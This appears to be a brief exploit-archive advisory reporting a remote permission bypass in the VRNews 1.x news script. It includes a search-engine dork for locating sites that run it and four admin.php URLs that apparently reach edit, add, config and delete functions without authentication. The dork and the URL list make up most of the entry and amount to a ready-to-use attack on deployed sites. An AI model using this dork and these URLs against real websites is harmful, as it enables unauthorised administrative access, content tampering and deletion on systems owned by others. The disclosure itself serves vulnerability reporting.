VRNews version 1.x suffers from a remote permission bypass vulnerability in admin.php.
07adecd4f4b1b6b14974c442bff909582be7c6dc4f0544072adf1c1a899ebe35
VRNews v1.x <= /VRNews/admin.php Permission
Found by: R4M! - Rami@live.de
Dork: intitle:"vrnews v1"
Script: http://www.toocharger.com/fiches/scripts/vrnews/3632.htm
Example:
1. /VRNews/admin.php?act=edit
2. /VRNews/admin.php?act=add
3. /VRNews/admin.php?act=config
4. /VRNews/admin.php?act=del